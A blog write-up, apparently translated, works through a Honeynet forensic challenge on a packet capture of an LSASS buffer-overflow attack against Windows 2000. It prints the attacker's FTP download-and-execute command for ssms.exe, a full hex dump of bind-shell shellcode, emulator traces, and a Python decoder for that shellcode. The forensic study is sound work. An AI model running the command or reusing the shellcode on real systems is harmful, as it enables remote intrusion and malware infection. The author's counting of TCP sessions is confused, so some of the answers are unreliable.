I have been meaning to try this one for a long time, and I am only now getting around to it. The English is a bit of a hurdle, though.......
URL: http://www.honeynet.org/node/504
1. Which systems (i.e. IP addresses) are involved? (2pts)
Question 1 simply asks which systems are involved.
Wireshark's Conversations feature makes this easy to check.
Glancing at a few packets, the attacker is 98.114.205.102 and the victim is 192.150.11.111.
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
This asks where the attacker is located.
The attacker was 98.114.205.102, so let's look that IP up on the site below.
http://www.robtex.com/ip/98.114.205.102.html#whois
3. How many TCP sessions are contained in the dump file? (2pts)
This asks for the number of TCP packets. Filtering on "TCP" in Wireshark shows 348 packets.
4. How long did it take to perform the attack? (2pts)
This appears to ask how long the attack took; the timestamp of the last packet in Wireshark gives the answer.
16.219218 seconds
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
First, packet #14 in Wireshark contains a check for whether the target is running Windows 2000.
So the target OS is Windows 2000.
As for the vulnerability, one of the packets contains a DsRoleUpgradeDownlevelServer request.
Searching Google for "DsRoleUpgradeDownlevelServer" turns up the following vulnerability:
Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow (CVE-2003-0533, MS04-011)
http://www.exploit-db.com/exploits/16368/
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
This asks for a rough sketch of the attack; from the packet analysis, the attack proceeds as follows.
1) Execute shellcode through the Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow vulnerability.
2) Once the shellcode runs, execute the command below. (It can be seen in packet #42 in Wireshark.)
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
3) The command above downloads and runs ssms.exe, infecting the host with malware.
7. What specific vulnerability was attacked? (2pts)
Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
This asks for an analysis of the shellcode.
Packet #29 in Wireshark contains a run of NOPs (0x90), so that part looks like the shellcode.
Let's save just the code below to a file and analyze it with scdbg (http://sandsprite.com/blogs/index.php?uid=7&pid=152), a tool built by modifying libemu (http://libemu.mwcollect.org).
Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000016 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000032 EB 10 5A 4A 33 C9 66 B9 7D 01 80 34 0A 99 E2 FA
00000048 EB 05 E8 EB FF FF FF 70 95 98 99 99 C3 FD 38 A9
00000064 99 99 99 12 D9 95 12 E9 85 34 12 D9 91 12 41 12
00000080 EA A5 12 ED 87 E1 9A 6A 12 E7 B9 9A 62 12 D7 8D
00000096 AA 74 CF CE C8 12 A6 9A 62 12 6B F3 97 C0 6A 3F
00000112 ED 91 C0 C6 1A 5E 9D DC 7B 70 C0 C6 C7 12 54 12
00000128 DF BD 9A 5A 48 78 9A 58 AA 50 FF 12 91 12 DF 85
00000144 9A 5A 58 78 9B 9A 58 12 99 9A 5A 12 63 12 6E 1A
00000160 5F 97 12 49 F3 9A C0 71 1E 99 99 99 1A 5F 94 CB
00000176 CF 66 CE 65 C3 12 41 F3 9C C0 71 ED 99 99 99 C9
00000192 C9 C9 C9 F3 98 F3 9B 66 CE 75 12 41 5E 9E 9B 99
00000208 9E 3C AA 59 10 DE 9D F3 89 CE CA 66 CE 69 F3 98
00000224 CA 66 CE 6D C9 C9 CA 66 CE 61 12 49 1A 75 DD 12
00000240 6D AA 59 F3 89 C0 10 9D 17 7B 62 10 CF A1 10 CF
00000256 A5 10 CF D9 FF 5E DF B5 98 98 14 DE 89 C9 CF AA
00000272 50 C8 C8 C8 F3 98 C8 C8 5E DE A5 FA F4 FD 99 14
00000288 DE A5 C9 C8 66 CE 79 CB 66 CE 65 CA 66 CE 65 C9
00000304 66 CE 7D AA 59 35 1C 59 EC 60 C8 CB CF CA 66 4B
00000320 C3 C0 32 7B 77 AA 59 5A 71 76 67 66 66 DE FC ED
00000336 C9 EB F6 FA D8 FD FD EB FC EA EA 99 DA EB FC F8
00000352 ED FC C9 EB F6 FA FC EA EA D8 99 DC E1 F0 ED CD
00000368 F1 EB FC F8 FD 99 D5 F6 F8 FD D5 F0 FB EB F8 EB
00000384 E0 D8 99 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA
00000400 F2 FC ED D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7
00000416 99 F8 FA FA FC E9 ED 99 FA F5 F6 EA FC EA F6 FA
00000432 F2 FC ED 99 90 90 90 90 90 90 90 90 90 90 90 90
00000448 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000464 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
Output from scdbg:
C:\Users\ByJJoon\Downloads\scdbg>scdbg.exe -f bin
Loaded 1e0 bytes from file bin
Initilization Complete..
Max Steps: 1000000
Using base offset: 0x401000
401140 GetProcAddress(CreateProcessA)
401140 GetProcAddress(ExitThread)
401140 GetProcAddress(LoadLibraryA)
4010b4 LoadLibraryA(ws2_32)
401140 GetProcAddress(WSASocketA)
401140 GetProcAddress(bind)
401140 GetProcAddress(listen)
401140 GetProcAddress(accept)
401140 GetProcAddress(closesocket)
4010ca WSASocket(2, 1, 0)
4010de bind(port: 1957 )
4010e4 listen(h=4711)
4010ea accept(h=4711)
401127 CreateProcessA( cmd, )
40112b closesocket(h=ffffffff)
40112f closesocket(h=4711)
401133 ExitThread(-1)
stepcount 7512
Output from libemu:
[byjjoon@ByJJoon shellcode]$ /opt/libemu/bin/sctest -Ss 100000 < bin
verbose = 0
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 7c800000
procname name is 'CreateProcessA'
dll is kernel32 7c800000 7c800000
found CreateProcessA at addr 7c802367
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 7c800000
procname name is 'ExitThread'
dll is kernel32 7c800000 7c800000
found ExitThread at addr 7c80c058
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 7c800000
procname name is 'LoadLibraryA'
dll is kernel32 7c800000 7c800000
found LoadLibraryA at addr 7c801d77
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:661 env_w32_hook_LoadLibrayA
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'WSASocketA'
dll is ws2_32 71a10000 71a10000
found WSASocketA at addr 71a18769
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'bind'
dll is ws2_32 71a10000 71a10000
found bind at addr 71a13e00
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'listen'
dll is ws2_32 71a10000 71a10000
found listen at addr 71a188d3
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'accept'
dll is ws2_32 71a10000 71a10000
found accept at addr 71a21028
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'closesocket'
dll is ws2_32 71a10000 71a10000
found closesocket at addr 71a19639
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:461 env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0, dwFlags=0);
socket 3
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:101 env_w32_hook_bind
bind(s=3, name=41716d, namelen=16
host 0.0.0.0 port 1957
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:231 env_w32_hook_listen
listen(s=3, backlog=1)
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:58 env_w32_hook_accept
accept(s=3, addr=0, addrlen=0);
From the scdbg output, this is bind shellcode that opens port 1957.
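As an added example (not part of the original post or of scdbg/libemu), the script below reads the XOR key and loop count out of the decoder stub that opens the dump above, decodes the body the way that stub would at run time, and lists the strings and bind port that scdbg reported. The stub layout and the sockaddr_in store pattern used to find the port are my reading of the bytes, not something the post states.

```python
import re
import struct
# Bytes copied from the hex dump above with the NOP sled trimmed (dump offsets 32..435).
SHELLCODE = bytes.fromhex(
    "eb105a4a33c966b97d0180340a99e2fa" "eb05e8ebffffff7095989999c3fd38a9"
    "99999912d99512e9853412d991124112" "eaa512ed87e19a6a12e7b99a6212d78d"
    "aa74cfcec812a69a62126bf397c06a3f" "ed91c0c61a5e9ddc7b70c0c6c7125412"
    "dfbd9a5a48789a58aa50ff129112df85" "9a5a58789b9a5812999a5a1263126e1a"
    "5f971249f39ac0711e9999991a5f94cb" "cf66ce65c31241f39cc071ed999999c9"
    "c9c9c9f398f39b66ce7512415e9e9b99" "9e3caa5910de9df389ceca66ce69f398"
    "ca66ce6dc9c9ca66ce6112491a75dd12" "6daa59f389c0109d177b6210cfa110cf"
    "a510cfd9ff5edfb5989814de89c9cfaa" "50c8c8c8f398c8c85edea5faf4fd9914"
    "dea5c9c866ce79cb66ce65ca66ce65c9" "66ce7daa59351c59ec60c8cbcfca664b"
    "c3c0327b77aa595a7176676666defced" "c9ebf6fad8fdfdebfceaea99daebfcf8"
    "edfcc9ebf6fafceaead899dce1f0edcd" "f1ebfcf8fd99d5f6f8fdd5f0fbebf8eb"
    "e0d899eeeaabc6aaab99cecad8caf6fa" "f2fcedd899fbf0f7fd99f5f0eaedfcf7"
    "99f8fafafce9ed99faf5f6eafceaf6fa" "f2fced99"
)

def parse_decoder_stub(sc):
    """Read loop count and XOR key from the 23-byte stub: jmp +0x10 / pop edx /
    dec edx / xor ecx,ecx / mov cx,N / xor byte [edx+ecx],K / loop / jmp +5 / call."""
    fixed = {0: "eb105a4a33c966b9", 10: "80340a", 14: "e2faeb05e8ebffffff"}
    for off, hexs in fixed.items():
        if sc[off:off + len(hexs) // 2] != bytes.fromhex(hexs):
            raise ValueError("not the expected XOR decoder stub")
    count = struct.unpack_from("<H", sc, 8)[0]   # imm16 of mov cx, N
    key = sc[13]                                 # imm8 of xor byte [edx+ecx], K
    start = 0x17  # call pushes 0x17, dec edx gives 0x16, loop touches [0x16+N]..[0x17]
    if start + count > len(sc):
        raise ValueError("stub claims more bytes than the dump contains")
    return start, count, key

def decode(sc):
    """Return the shellcode with its encoded body XORed back to plaintext."""
    start, count, key = parse_decoder_stub(sc)
    return sc[:start] + bytes(b ^ key for b in sc[start:start + count])

def strings(data, minlen=4):
    """Printable ASCII runs, as a strings(1) pass over the decoded bytes would show."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % minlen, data)]

def bind_port(decoded):
    """Assumed layout: the decoded code fills sockaddr_in with mov dword [edi], imm32
    (bytes C7 07 02 00 <port, network order>); read the port from that immediate."""
    i = decoded.find(b"\xc7\x07\x02\x00")
    return int.from_bytes(decoded[i + 4:i + 6], "big") if i >= 0 else None

if __name__ == "__main__":
    print(strings(decode(SHELLCODE)), "port", bind_port(decode(SHELLCODE)))  # ... 1957
```

The recovered import names (ws2_32, WSASocketA, bind, listen, accept, closesocket, CreateProcessA with "cmd") and the port 1957 are exactly what the emulator runs above show, which is a quick way to cross-check an emulator's verdict against the raw bytes.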
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
Hmm?
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
The file transferred by the command below is ssms.exe.
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
Extracting that file from Wireshark, its MD5 is 14a09a48ad23fe0ea5a180bee8cb750a.
Looking that MD5 up on VirusTotal gives the following:
http://www.virustotal.com/file-scan/report.html?id=b14ccb3786af7553f7c251623499a7fe67974dde69d3dffd65733871cddf6b6d-1299265132
11. Do you think this is a manual or an automated attack? Why? (2pts)
This asks whether the attack was manual or automated.
Obviously it's automated, isn't it? -_-a